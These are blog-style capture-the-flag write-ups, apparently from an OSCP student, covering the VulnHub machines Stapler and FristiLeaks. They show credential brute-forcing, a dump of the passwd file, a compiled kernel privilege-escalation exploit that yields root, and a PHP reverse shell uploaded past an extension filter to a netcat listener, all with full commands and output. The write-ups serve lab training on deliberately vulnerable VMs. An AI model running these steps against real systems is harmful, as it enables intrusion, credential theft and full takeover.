> drwxr-xr-x 2 0 0 4096 > Jun 03 2016 mdadm > -rw-r–r– 1 0 0 24241 > Oct 30 2015 mime.types > -rw-r–r– 1 > 0 0 967 Oct 30 2015 > mke2fs.conf
> drwxr-xr-x 2 0 0 4096 > Jun 03 2016 modprobe.d > -rw-r–r– 1 > 0 0 195 Apr 20 2016 > modules
> drwxr-xr-x 2 0 0 4096 > Jun 03 2016 modules-load.d > lrwxrwxrwx 1 0 0 19 > Jun 03 2016 mtab -> ../proc/self/mounts > drwxr-xr-x 4 0 0 4096 > Jun 06 2016 mysql > drwxr-xr-x 7 0 0 4096 > Jun 03 2016 network > -rw-r–r– 1 > 0 0 91 Oct 22 2015 > networks
> drwxr-xr-x 2 0 0 4096 > Jun 03 2016 newt > -rw-r–r– 1 > 0 0 497 May 04 2014 > nsswitch.conf
> drwxr-xr-x 2 0 0 4096 > Apr 20 2016 opt > lrwxrwxrwx 1 0 0 21 > Jun 03 2016 os-release -> ../usr/lib/os-release > -rw-r–r– 1 0 0 6595 > Jun 23 2015 overlayroot.conf > -rw-r–r– 1 > 0 0 552 Mar 16 2016 > pam.conf
> drwxr-xr-x 2 0 0 4096 > Jun 03 2016 pam.d > -rw-r–r– 1 0 0 2908 > Jun 04 2016 passwd > -rw——- 1 0 0 2869 > Jun 03 2016 passwd- > drwxr-xr-x 4 0 0 4096 > Jun 03 2016 perl > drwxr-xr-x 3 0 0 4096 > Jun 03 2016 php > drwxr-xr-x 3 0 0 4096 > Jun 06 2016 phpmyadmin > drwxr-xr-x 3 0 0 4096 > Jun 03 2016 pm > drwxr-xr-x 5 0 0 4096 > Jun 03 2016 polkit-1 > drwxr-xr-x 3 0 0 4096 > Jun 03 2016 postfix > drwxr-xr-x 4 0 0 4096 > Jun 03 2016 ppp > -rw-r–r– 1 > 0 0 575 Oct 22 2015 > profile
> drwxr-xr-x 2 0 0 4096 > Jun 03 2016 profile.d > -rw-r–r– 1 0 0 2932 > Oct 25 2014 protocols > drwxr-xr-x 2 0 0 4096 > Jun 03 2016 python > drwxr-xr-x 2 0 0 4096 > Jun 03 2016 python2.7 > drwxr-xr-x 2 0 0 4096 > Jun 03 2016 python3 > drwxr-xr-x 2 0 0 4096 > Jun 03 2016 python3.5 > -rwxr-xr-x 1 0 0 472 > Jun 06 2016 rc.local > drwxr-xr-x 2 0 0 4096 > Jun 06 2016 rc0.d > drwxr-xr-x 2 0 0 4096 > Jun 06 2016 rc1.d > drwxr-xr-x 2 0 0 4096 > Jun 06 2016 rc2.d > drwxr-xr-x 2 0 0 4096 > Jun 06 2016 rc3.d > drwxr-xr-x 2 0 0 4096 > Jun 06 2016 rc4.d > drwxr-xr-x 2 0 0 4096 > Jun 06 2016 rc5.d > drwxr-xr-x 2 0 0 4096 > Jun 06 2016 rc6.d > drwxr-xr-x 2 0 0 4096 > Jun 06 2016 rcS.d > -rw-r–r– 1 > 0 0 63 Dec 17 17:34 > resolv.conf
> drwxr-xr-x 5 0 0 4096 > Jun 06 2016 resolvconf > -rwxr-xr-x 1 0 0 268 > Nov 10 2015 rmt > -rw-r–r– 1 > 0 0 887 Oct 25 2014 rpc > -rw-r–r– 1 0 0 1371 > Jan 27 2016 rsyslog.conf > drwxr-xr-x 2 0 0 4096 > Jun 03 2016 rsyslog.d > drwxr-xr-x 3 0 0 4096 > Dec 17 15:27 samba > -rw-r–r– 1 0 0 3663 > Jun 09 2015 screenrc > -rw-r–r– 1 0 0 4038 > Mar 29 2016 securetty > drwxr-xr-x 4 0 0 4096 > Jun 03 2016 security > drwxr-xr-x 2 0 0 4096 > Jun 03 2016 selinux > -rw-r–r– 1 0 0 19605 > Oct 25 2014 services > drwxr-xr-x 2 0 0 4096 > Jun 03 2016 sgml > -rw-r—– 1 0 42 4518 > Jun 05 2016 shadow > -rw——- 1 0 0 1873 > Jun 03 2016 shadow- > -rw-r–r– 1 > 0 0 125 Jun 03 2016 > shells
> drwxr-xr-x 2 0 0 4096 > Jun 03 2016 skel > -rw-r–r– 1 > 0 0 100 Nov 25 2015 > sos.conf
> drwxr-xr-x 2 0 0 4096 > Jun 04 2016 ssh > drwxr-xr-x 4 0 0 4096 > Jun 03 2016 ssl > -rw-r–r– 1 > 0 0 644 Jun 04 2016 > subgid
> -rw——- 1 0 0 625 > Jun 03 2016 subgid- > -rw-r–r– 1 > 0 0 644 Jun 04 2016 > subuid
> -rw——- 1 0 0 625 > Jun 03 2016 subuid- > -r–r—– 1 > 0 0 769 Jun 05 2016 > sudoers
> drwxr-xr-x 2 0 0 4096 > Jun 03 2016 sudoers.d > -rw-r–r– 1 0 0 2227 > Jun 03 2016 sysctl.conf > drwxr-xr-x 2 0 0 4096 > Jun 03 2016 sysctl.d > drwxr-xr-x 5 0 0 4096 > Jun 03 2016 systemd > drwxr-xr-x 2 0 0 4096 > Jun 03 2016 terminfo > -rw-r–r– 1 > 0 0 14 Jun 03 2016 > timezone
> drwxr-xr-x 2 0 0 4096 > Apr 12 2016 tmpfiles.d > -rw-r–r– 1 0 0 1260 > Mar 16 2016 ucf.conf > drwxr-xr-x 4 0 0 4096 > Jun 03 2016 udev > drwxr-xr-x 3 0 0 4096 > Jun 03 2016 ufw > drwxr-xr-x 2 0 0 4096 > Jun 03 2016 update-motd.d > drwxr-xr-x 2 0 0 4096 > Jun 03 2016 update-notifier > drwxr-xr-x 2 0 0 4096 > Jun 03 2016 vim > drwxr-xr-x 3 0 0 4096 > Jun 03 2016 vmware-tools > -rw-r–r– 1 > 0 0 278 Jun 03 2016 > vsftpd.banner
> -rw-r–r– 1 > 0 0 0 Jun 03 2016 > vsftpd.chroot_list > -rw-r–r– 1 0 0 5961 > Jun 04 2016 vsftpd.conf > -rw-r–r– 1 > 0 0 0 Jun 03 2016 > vsftpd.user_list
> lrwxrwxrwx 1 0 0 23 > Jun 03 2016 vtrgb -> /etc/alternatives/vtrgb > -rw-r–r– 1 0 0 4942 > Jan 08 2016 wgetrc > drwxr-xr-x 3 0 0 4096 > Jun 03 2016 xdg > drwxr-xr-x 2 0 0 4096 > Jun 03 2016 xml > drwxr-xr-x 2 0 0 4096 > Jun 03 2016 zsh > 226 Directory send OK. This is really bad. All the files you see above could be downloaded now. For example, the passwd file. > $ ftp > get passwd And then if you view the file, you get the following content: > root@kali:/tmp/stapler1# cat passwd > root:x:0:0:root:/root:/bin/zsh > daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin > bin:x:2:2:bin:/bin:/usr/sbin/nologin > sys:x:3:3:sys:/dev:/usr/sbin/nologin > sync:x:4:65534:sync:/bin:/bin/sync > games:x:5:60:games:/usr/games:/usr/sbin/nologin > man:x:6:12:man:/var/cache/man:/usr/sbin/nologin > lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin > mail:x:8:8:mail:/var/mail:/usr/sbin/nologin > news:x:9:9:news:/var/spool/news:/usr/sbin/nologin > uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin > proxy:x:13:13:proxy:/bin:/usr/sbin/nologin > www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin > backup:x:34:34:backup:/var/backups:/usr/sbin/nologin > list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin > irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin > gnats:x:41:41:Gnats Bug-Reporting System > (admin):/var/lib/gnats:/usr/sbin/nologin > nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin > systemd-timesync:x:100:102:systemd Time > Synchronization,,,:/run/systemd:/bin/false > systemd-network:x:101:103:systemd Network > Management,,,:/run/systemd/netif:/bin/false > systemd-resolve:x:102:104:systemd > Resolver,,,:/run/systemd/resolve:/bin/false > systemd-bus-proxy:x:103:105:systemd Bus > Proxy,,,:/run/systemd:/bin/false > syslog:x:104:108::/home/syslog:/bin/false > _apt:x:105:65534::/nonexistent:/bin/false > lxd:x:106:65534::/var/lib/lxd/:/bin/false > dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/bin/false > messagebus:x:108:111::/var/run/dbus:/bin/false > sshd:x:109:65534::/var/run/sshd:/usr/sbin/nologin > peter:x:1000:1000:Peter,,,:/home/peter:/bin/zsh > mysql:x:111:117:MySQL Server,,,:/nonexistent:/bin/false > RNunemaker:x:1001:1001::/home/RNunemaker:/bin/bash > ETollefson:x:1002:1002::/home/ETollefson:/bin/bash > DSwanger:x:1003:1003::/home/DSwanger:/bin/bash > AParnell:x:1004:1004::/home/AParnell:/bin/bash > SHayslett:x:1005:1005::/home/SHayslett:/bin/bash > MBassin:x:1006:1006::/home/MBassin:/bin/bash > JBare:x:1007:1007::/home/JBare:/bin/bash > LSolum:x:1008:1008::/home/LSolum:/bin/bash > IChadwick:x:1009:1009::/home/IChadwick:/bin/false > MFrei:x:1010:1010::/home/MFrei:/bin/bash > SStroud:x:1011:1011::/home/SStroud:/bin/bash > CCeaser:x:1012:1012::/home/CCeaser:/bin/dash > JKanode:x:1013:1013::/home/JKanode:/bin/bash > CJoo:x:1014:1014::/home/CJoo:/bin/bash > Eeth:x:1015:1015::/home/Eeth:/usr/sbin/nologin > LSolum2:x:1016:1016::/home/LSolum2:/usr/sbin/nologin > JLipps:x:1017:1017::/home/JLipps:/bin/sh > jamie:x:1018:1018::/home/jamie:/bin/sh > Sam:x:1019:1019::/home/Sam:/bin/zsh > Drew:x:1020:1020::/home/Drew:/bin/bash > jess:x:1021:1021::/home/jess:/bin/bash > SHAY:x:1022:1022::/home/SHAY:/bin/bash > Taylor:x:1023:1023::/home/Taylor:/bin/sh > mel:x:1024:1024::/home/mel:/bin/bash > kai:x:1025:1025::/home/kai:/bin/sh > zoe:x:1026:1026::/home/zoe:/bin/bash > NATHAN:x:1027:1027::/home/NATHAN:/bin/bash > www:x:1028:1028::/home/www: > postfix:x:112:118::/var/spool/postfix:/bin/false > ftp:x:110:116:ftp daemon,,,:/var/ftp:/bin/false > elly:x:1029:1029::/home/elly:/bin/bash This is really bad. Can I get an interactive shell using this same credentials??
GAINING LOW PRIVILEGE SHELL USING OBTAINED CREDENTIALS (THROUGH SMB ENUMERATION)
While I put the banner here, if you have been reading until this point, you will know that the steps on this path are as follows: * Performed SMB enumeration * Obtained list of users and use it to create a wordlist for performing brute force attacks * Used hydra to perform brute force attack on FTP service and had successfully gained authenticated access and able to download files e.g. passwd
What if I replace SSH service instead of FTP service on step 3? Can I gain a low privilege shell on my target machine using the following credential?
> username: SHayslett > password: SHayslett Apparently, the answer is YES > $ ssh SHayslett@192.168.117.136 >
> —————————————————————– > ~ Barry, don’t forget to put a message > here ~ > —————————————————————– > SHayslett@192.168.117.136’s password: > Welcome back!
>
>
> SHayslett@red:~$ iduid=1005(SHayslett) gid=1005(SHayslett) > groups=1005(SHayslett) Wait, while it is entirely unnecessary, but I have not looked at port 3306 and 12380 yet. Will there be other ways to gain a foothold in the system apart from the above method? Maybe. But that is for next time – provided that I can find some other ways to gain entry (and have the time for it). > _Update on 30 April 2018: I just posted a new write-up on a > different path to gain entry into the machine using a method apart > from the SMB enumeration I used in this write-up. If you’re > interested, make your way to Write-up for Stapler: 1 – A > Different Path
> _
PRIVILEGE ESCALATION – LOCAL ENUMERATION Once again, it’s time to throw in our favourite enumeration scripts to look for possibilities to perform privilege escalation. Since we have SSH access, we can simply use SCP to transfer files or use whatever other methods you prefer e.g ftp, http, etc. Here are some of the interesting information that I have shortlisted: First, these are the kernel information. This information is extremely important when performing privilege escalation. > Linux version 4.4.0-21-generic (buildd@lgw01-06) (gcc version 5.3.1 > 20160413 (Ubuntu 5.3.1-14ubuntu2) ) #37-Ubuntu SMP Mon Apr 18 > 18:34:49 UTC 2016 >
> DISTRIB_ID=Ubuntu > DISTRIB_RELEASE=16.04 > DISTRIB_CODENAME=xenial > DISTRIB_DESCRIPTION=”Ubuntu 16.04 LTS” Also, seems like /home/www is world accessible: > # permissions on /home directories: > total 128K
> drwxr-xr-x 32 root root 4.0K > Jun 4 2016 . > drwxr-xr-x 22 root root 4.0K > Jun 7 2016 .. > drwxr-xr-x 2 AParnell AParnell 4.0K Jun 5 2016 > AParnell
> drwxr-xr-x 2 CCeaser CCeaser 4.0K Jun 5 2016 > CCeaser
> drwxr-xr-x 2 CJoo CJoo 4.0K > Jun 5 2016 CJoo > drwxr-xr-x 2 Drew Drew 4.0K > Jun 5 2016 Drew > drwxr-xr-x 2 DSwanger DSwanger 4.0K Jun 5 2016 > DSwanger
> drwxr-xr-x 2 Eeth Eeth 4.0K > Jun 5 2016 Eeth > drwxr-xr-x 2 elly elly 4.0K > Jun 5 2016 elly > drwxr-xr-x 2 ETollefson ETollefson 4.0K Jun 5 2016 > ETollefson
> drwxr-xr-x 2 IChadwick IChadwick 4.0K Jun 5 2016 > IChadwick
> drwxr-xr-x 2 jamie jamie 4.0K > Jun 5 2016 jamie > drwxr-xr-x 2 JBare JBare 4.0K > Jun 5 2016 JBare > drwxr-xr-x 2 jess jess 4.0K > Jun 5 2016 jess > drwxr-xr-x 2 JKanode JKanode 4.0K Jun 5 2016 > JKanode
> drwxr-xr-x 2 JLipps JLipps 4.0K > Jun 5 2016 JLipps > drwxr-xr-x 2 kai kai 4.0K > Jun 5 2016 kai > drwxr-xr-x 2 LSolum LSolum 4.0K > Jun 5 2016 LSolum > drwxr-xr-x 2 LSolum2 LSolum2 4.0K Jun 5 2016 > LSolum2
> drwxr-xr-x 2 MBassin MBassin 4.0K Jun 5 2016 > MBassin
> drwxr-xr-x 2 mel mel 4.0K > Jun 5 2016 mel > drwxr-xr-x 2 MFrei MFrei 4.0K > Jun 5 2016 MFrei > drwxr-xr-x 2 NATHAN NATHAN 4.0K > Jun 5 2016 NATHAN > drwxr-xr-x 3 peter peter 4.0K > Jun 3 2016 peter > drwxr-xr-x 2 RNunemaker RNunemaker 4.0K Jun 5 2016 > RNunemaker
> drwxr-xr-x 2 Sam Sam 4.0K > Jun 5 2016 Sam > drwxr-xr-x 2 SHAY SHAY 4.0K > Jun 5 2016 SHAY > drwxr-xr-x 3 SHayslett SHayslett 4.0K Dec 17 19:12 > SHayslett
> drwxr-xr-x 2 SStroud SStroud 4.0K Jun 5 2016 > SStroud
> drwxr-xr-x 2 Taylor Taylor 4.0K > Jun 5 2016 Taylor > drwxrwxrwx 2 www www 4.0K > Jun 5 2016 www > drwxr-xr-x 2 zoe zoe 4.0K > Jun 5 2016 zoe Netstats information. interestingly, there is a locally run SMTP server (127.0.0.1), probably something specially put there for one to perform privilege escalation > Active Internet connections (servers and established) > Proto Recv-Q Send-Q Local Address Foreign > Address State PID/Program name > tcp 0 0 > 0.0.0.0:3306 0.0.0.0:* LISTEN – >
> tcp 0 0 > 0.0.0.0:139 0.0.0.0:* LISTEN – >
> tcp 0 0 > 0.0.0.0:80 0.0.0.0:* LISTEN – >
> tcp 0 0 > 0.0.0.0:21 0.0.0.0:* LISTEN – >
> tcp 0 0 > 0.0.0.0:53 0.0.0.0:* LISTEN – >
> tcp 0 0 > 0.0.0.0:22 0.0.0.0:* LISTEN – >
> tcp 0 0 > 0.0.0.0:8888 0.0.0.0:* LISTEN – >
> tcp 0 0 > 127.0.0.1:25 0.0.0.0:* LISTEN – >
> tcp 0 0 > 0.0.0.0:666 0.0.0.0:* LISTEN – >
> tcp 0 0 > 0.0.0.0:12380 0.0.0.0:* LISTEN – >
> tcp 0 0 > 0.0.0.0:445 0.0.0.0:* LISTEN – >
> tcp 0 0 > 192.168.117.136:22 192.168.117.134:53878 ESTABLISHED > –
> tcp6 0 0 > :::139 :::* LISTEN – >
> tcp6 0 0 > :::53 :::* LISTEN – >
> tcp6 0 0 > :::22 :::* LISTEN – >
> tcp6 0 0 > :::445 :::* LISTEN – I didn’t know there is a port 8888 running though. I attempted to connect to it from external, doesn’t work. Even nmap has shown that the service port is filtered. > $ nmap -sS -Pn -T4 -p8888 192.168.117.136 >
> Starting Nmap 7.50 ( https://nmap.org ) at > 2017-12-17 19:22 +08 > Nmap scan report for 192.168.117.136 > Host is up (0.00031s latency). > PORT STATE SERVICE > 8888/tcp filtered sun-answerbook And after checking the locally running services, I finally understand what was the issue.
>
> root 1430 0.0 0.3 6472 3220 > ? S 15:27 0:00 su -c cd /home/JKanode; > python2 -m SimpleHTTPServer 8888 &>/dev/null JKanode >
Apparently, there was an HTTP server setup indeed, but whoever connect to it will be output to /dev/null, ouch. Other findings from local privilege escalation enumeration on software version information: > Sudo version:
> Sudo version 1.8.16 >
> MYSQL version:
> mysql Ver 14.14 Distrib 5.7.12, for Linux (i686) > using EditLine wrapper >
> Apache version:
> Server version: Apache/2.4.18 (Ubuntu) > Server built: 2016-04-15T18:00:57 The author has been very nice to leave all these tools in the box: > /bin/nc
> /bin/netcat
> /usr/bin/wget
> /usr/bin/gcc
That’s it for now, is there anything you noticed that can help us gain access to root already? PRIVILEGE ESCALATION USING KERNEL EXPLOIT One of the easier ways to escalate privileges is to run an existing kernel exploits. Sometimes, it can be a pain to make it work, but if you understand the underlying issue and what is the exploit trying to do, you can usually make it work. > $ searchsploit ‘4.4.0-21’ >
> ———————————————————————- > ———————————- > Exploit
> Title | Path >
> | > (/usr/share/exploitdb/) > ———————————————————————- > ———————————- > Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) – Netfilter target_offset > Ou | exploits/lin_x86-64/local/40049.c > ———————————————————————- > ———————————- This is not going to work because our target machine runs on 32-bit while the exploit is for 64-bit machines. What 32-bit, you asked? Here’s a reminder: > $ uname -a
>
> Linux red.initech 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 > 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux Another way is to search for the Ubuntu version 16.04. > $ searchsploit ‘16.04’ >
> ———————————————————————- > ———————————- > Exploit
> Title | Path >
> | > (/usr/share/exploitdb/) > ———————————————————————- > ———————————- > Apport 2.x (Ubuntu Desktop 12.10 < 16.04) – Local Code > Execution | exploits/linux/local/40937.txt > Exim 4 (Debian 8 / Ubuntu 16.04) – Spool Privilege > Escalation | exploits/linux/local/40054.c > Google Chrome + Fedora 25 / Ubuntu 16.04 – ‘tracker-extract’ / > ‘gnome | exploits/linux/local/40943.txt > LightDM (Ubuntu 16.04/16.10) – Guest Account Local Privilege > Escalati | exploits/linux/local/41923.txt > Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / > Fed | exploits/lin_x86-64/local/42275.c > Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora > 23/ | exploits/lin_x86/local/42276.c > Linux Kernel (Ubuntu 16.04) – Reference Count Overflow Using BPF > Maps | exploits/linux/dos/39773.txt > Linux Kernel 4.4 (Ubuntu 16.04) – ‘BPF’ Local Privilege > Escalation (M | exploits/linux/local/40759.rb > Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) – ‘AF_PACKET’ > Race Con | exploits/lin_x86-64/local/40871.c > Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) – Netfilter target_offset > Ou | exploits/lin_x86-64/local/40049.c > Linux Kernel 4.4.x (Ubuntu 16.04) – ‘double-fdput()’ > bpf(BPF_PROG_LOA | exploits/linux/local/39772.txt > Linux Kernel 4.6.2 (Ubuntu 16.04.1) – ‘IP6T_SO_SET_REPLACE’ > Local Pri | exploits/linux/local/40489.txt > censura 1.16.04 – Blind SQL Injection / Cross-Site > Scripting | exploits/php/webapps/9129.txt > ———————————————————————- > ———————————- After reading the descriptions of a few of the exploits, I have selected the double-fdput exploit, ID 39772. The following is its description:
https://gist.github.com/kongwenbin/42f193df5c97b543356a253a3fc112a7 The URL in the file that leads us to the POC files are all giving 404 error. However, something I learn from my OSCP journey is to be able to look for information online using a magical tool called a “SEARCH ENGINE“, or some call it “Google” I have managed to find the original exploit file on chromium :
Now let’s transfer it to the target machine using SCP. It’s very convenient since I have SSH credentials > scp exploit.tar SHayslett@192.168.117.136:/tmp/ > —————————————————————– > ~ Barry, don’t forget to put a message > here ~ > —————————————————————– > SHayslett@192.168.117.136’s password: > exploit.tar 100% 20KB 4.9MB/s 00:00 Now that I have the file locally on the target machine, it is time to compile the exploit! > tar xvf exploit.tar > ebpf_mapfd_doubleput_exploit/ > ebpf_mapfd_doubleput_exploit/hello.c > ebpf_mapfd_doubleput_exploit/suidhelper.c > ebpf_mapfd_doubleput_exploit/compile.sh > ebpf_mapfd_doubleput_exploit/doubleput.c > SHayslett@red:/tmp$ cd ebpf_mapfd_doubleput_exploit/ > SHayslett@red:/tmp/ebpf_mapfd_doubleput_exploit$ ./compile.sh > doubleput.c: In function ‘make_setuid’: > doubleput.c:91:13: warning: cast from pointer to integer of > different size
> .insns = (__aligned_u64) insns, > ^ > doubleput.c:92:15: warning: cast from pointer to integer of > different size
> .license = (__aligned_u64)”” > ^ And it’s done. There was a few warnings but overall looks good! Now, run the exploit: > SHayslett@red:/tmp/ebpf_mapfd_doubleput_exploit$ ./doubleput > starting writev
> woohoo, got pointer reuse > writev returned successfully. if this worked, you’ll have a root > shell in <=60 seconds. > suid file detected, launching rootshell… > we have root privs now… > root@red:/tmp/ebpf_mapfd_doubleput_exploit# id > uid=0(root) gid=0(root) groups=0(root),1005(SHayslett) There you go! I am now root Lastly, the flag.txt > root@red:/root# cat flag.txt > ~~~~~~~~~~<(Congratulations)>~~~~~~~~~~ > .-””’-. > |’—–‘| > |-…..-| > | | >
> | | >
> _,._ | | > __.o` o`”-. | | > .-O o `”-.o O )_,._ | | > ( o O o )–.-“`O o”-.`’—–‘` > ‘——–‘ ( o O o) > `———-` > b6b545dc11b7a270f4bad23432190c75162c4a2b ------------------------- If you like this post, please check out my other similar write-ups as well:
* Write-up for FristiLeaks v1.3 * Write-up for Kioptrix: 2014 (#5) * Write-up for Kioptrix: Level 1.3 (#4) * Write-up for Kioptrix: Level 1.2 (#3) * Write-up for Kioptrix: Level 1.1 (#2) * Write-up for Kioptrix: Level 1 (#1) SHARE THIS:
* Click to share on LinkedIn (Opens in new window) * Click to share on Facebook (Opens in new window) * Click to share on Twitter (Opens in new window) * Click to share on WhatsApp (Opens in new window) * Click to share on Telegram (Opens in new window) * Click to share on Pocket (Opens in new window) * Click to share on Reddit (Opens in new window) * Click to share on Tumblr (Opens in new window) * Click to email this to a friend (Opens in new window) *
1 Comment
WRITE-UP FOR FRISTILEAKS V1.3 December 31, 2017
Wen Bin KONG CTF
, Resources
CTF
, FristiLeaks
, privilege
escalation
,
Resources , tutorial , vm
, vulnhub
, writeup
To celebrate the end of 2017, I have decided to do a write-up on a VulnHub virtual machine (VM) like what I did for the Writeup for the Kioptrix series .
It has proved to be an effective exercise because apart from improving my writing and explanation skills, I also get to refresh the technical skills and techniques which I learnt previously while studying for my OSCP certification exams. Do read my OSCP/PWK course review if
you are intending to take your OSCP certification exams in 2018! Practice makes perfect As mentioned previously during
my very first VulnHub write-up, the VMs on VulnHub were designed to be vulnerable, specifically created for security researchers or any security enthusiasts to conduct security testing on them. It is a good way to test your technical skills from identifying vulnerabilities when you encounter one, to crafting your own exploits or getting publicly available Proof of Concept (POC) to work. SETTING UP
In this write-up, we will be working on the FristiLeaks v1.3 . Before we get
started, let’s manually modify the VM’s MAC address to _08:00:27_:A5:A6_:76_ as per instructed by the author. Instructions
for VMware Workstation users to modify MAC Address Written instructions for VMware Workstation users: * Import the OVA
* Click on Edit virtual machine settings * Under Hardware tab, click on Network Adapter * On the right section of the window, click on Advanced * In the pop-out window, insert the MAC address which the VM creator has instructed.
That’s it, now you can launch the VM. FristiLeaks v1.3
Please note that for the sake of writing this article, I have changed my VM’s Network Adapter settings to _NAT_ instead of the default “_Bridged_“, but there should be no difference for you to keep up with the write-up.
HOST DISCOVERY
netdiscover -r 192.168.117.0/24 Looks like our target has been found to be hosted on 192.168.117.135. Do you find the MAC address familiar in some ways? 192.168.117.135 08:00:27:a5:a6:76 1 60 PCS Systemtechnik GmbH SERVICE DISCOVERY
nmap -sS -Pn -T4 -p- 192.168.117.135 Starting Nmap 7.50 ( https://nmap.org ) at 2017-12-16 22:59 +08 Nmap scan report for 192.168.117.135 Host is up (0.00038s latency). Not shown: 65534 filtered ports PORT STATE SERVICE 80/tcp open http MAC Address: 08:00:27:A5:A6:76 (Oracle VirtualBox virtual NIC) ENUMERATION – PORT 80 Interesting, there is only 1 open port. Let’s scan the port 80 specifically using scripts: nmap -A -O -p80 192.168.117.135 Starting Nmap 7.50 ( https://nmap.org ) at 2017-12-16 23:21 +08 Nmap scan report for 192.168.117.135 Host is up (0.00029s latency). PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3) | http-methods:
|_ Potentially risky methods: TRACE | http-robots.txt: 3 disallowed entries |_/cola /sisi /beer |_http-server-header: Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3 |_http-title: Site doesn't have a title (text/html; charset=UTF-8). MAC Address: 08:00:27:A5:A6:76 (Oracle VirtualBox virtual NIC)
Now let’s manually check the web server running on port 80: For the sake of clarity, you may also want to verify the robots.txt disallowed entries that were identified by nmap. But trust me, nmap’s script is pretty accurate. At this point, my thought was — if this is the entry to gain access to the system, then this machine might be a little too simple. It cannot be so simple. As expected!! All the 3 entries have brought us to the above meme. Since all the 3 entries were deadends, let’s run our directory buster.
dirb http://192.168.117.135
---- Scanning URL: http://192.168.117.135/ ---- + http://192.168.117.135/cgi-bin/ (CODE:403|SIZE:210) ==> DIRECTORY: http://192.168.117.135/images/ + http://192.168.117.135/index.html (CODE:200|SIZE:703) + http://192.168.117.135/robots.txt (CODE:200|SIZE:62) ---- Entering directory: http://192.168.117.135/images/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) Nothing interesting found except for the directory listing of images: Only 2 images. Now, on second thoughts, the PINK COLOUR keep-calm image seems to be a hint, since it says, > KEEP CALM AND DRINK FRISTI There were pages for Cola, Sisi and Beer. What about Fristi, since it is also a form of drinking beverage? Let’s visit http://192.168.117.135/fristi/ Wow. Just, wow. It’s actually there. There is this hidden admin portal with a very badly designed login form which has auto-complete feature being enabled in both input fields. (yeah, including the password).
And there is this guy in the image that is going “Ha Ha” … Moving on, let’s run the directory buster again. dirb http://192.168.117.135/fristi/
---- Scanning URL: http://192.168.117.135/fristi/ ---- + http://192.168.117.135/fristi/index.php (CODE:200|SIZE:134605) ==> DIRECTORY: http://192.168.117.135/fristi/uploads/ ---- Entering directory: http://192.168.117.135/fristi/uploads/ ---- + http://192.168.117.135/fristi/uploads/index.html (CODE:200|SIZE:4)
We found something! BUT it looks like kind of a dead-end… at least for now.
Since there is nothing else here, let’s go back and view the page source of the login page. As my colleague, Sven , has always told me when we are working on a project — always view the page source, never trust the rendered output. It’s very well said, as I have found several vulnerabilities on web applications that messed up because some developers did not expect their users to either view the page source on their web browser (e.g. Firefox users can right-click, view page source) or view the HTTP responses directly on a HTTP proxy server. Back to the write-up — indeed, the page source has several interesting stuff. For example, the meta description content is hilarious:
super leet password login-test page. We use base64 encoding for images so they are inline in the HTML. I read somewhere on the web, that thats a good way to do it. Also, the TODO comments are very interesting as well: There are two things that I can infer from reading this TODO list: There are two things that I could infer from reading this TODO list:
* “eezeepz” is the name of the developer who created this application.
* He is the type who write notes within the application. Assuming he uses “eezeepz” as his username, what could the password be? Going further down the page source, we can see that there is another chunk of base64 encoded content that was commented. Well, what could it be? To decode the base64 encoded content, I used NANO to make the content into a single line. It can be any other tools that you like – I need it to be a single line so I can conveniently use my terminal to run a command to decode it. base64 -d /tmp/encoded.txt Wow. Apparently, it is a PNG image file, as you can see in the very first line of characters. Seems like it somehow links back to the meta description content of “using base64 encoding for images”. First, we save it as a PNG file. base64 -d /tmp/encoded.txt > decoded.png Next, we render it and see what is in the image. Again, you can use any tools to do this. For me, I like to use FEH. feh decoded.png
Interesting… for some reason, the only correlation of things that I can use for this set of characters is probably someone’s password… Let’s try the following credentials on the login form: username:eezeepz
password:keKkeKKeKKeKkEkkEk Bingo!! Finally some progress! Looks like the only available function is the upload file feature. Now what? let’s conveniently upload a PHP reverse shell! GAINING LOW PRIVILEGE ACCESS SHELL Simply modify and use the one from kali. If you are not using kali, you can download the reverse shell source code here , created
by pentestmonkey.
cp /usr/share/webshells/php/php-reverse-shell.php reverse-shell.php vi reverse-shell.php Make the necessary changes to insert your own local IP address and listening port.
Now setup a netcat listener to catch the connection. nc -nlvp 8888
Bad news! Only png, jpg, gif are allowed. Looks like things are not so easy after all. There are many ways to configure a file upload function. Developers should consider many different things. For instance, to prevent directory traversal, they should use base() or rename the file completely (use microtime() and some random numbers). Also, check the file type and size if there is any limitation to be enforced. The question now is, did the developer of this application implemented the file upload functionality correctly? Or is it only validating the file extension? What if I just add the .jpg extension to the php file, will it be able to bypass the validation filters? cp reverse-shell.php reverse-shell.php.jpg Since this is a VulnHub VM, there is no harm in trying things out! We all learn.
Surprisingly (or maybe as expected), IT WORKS!! As hinted by the output, now is the time to go back to the “dead-end” that we have identified previously and walk the newly discovered path.
Render the following URL in your web browser: * http://192.168.117.135/fristi/uploads/reverse-shell.php.jpg After rendering the page, a reverse shell has been established on your local machine!
root@kali:/tmp# nc -nlvp 8888 listening on 8888 ... connect to from (UNKNOWN) 41116 Linux localhost.localdomain 2.6.32-573.8.1.el6.x86_64 #1 SMP Tue Nov 10 18:01:38 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux 20:59:09 up 3:45, 0 users, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=48(apache) gid=48(apache) groups=48(apache) sh: no job control in this shell sh-4.1$
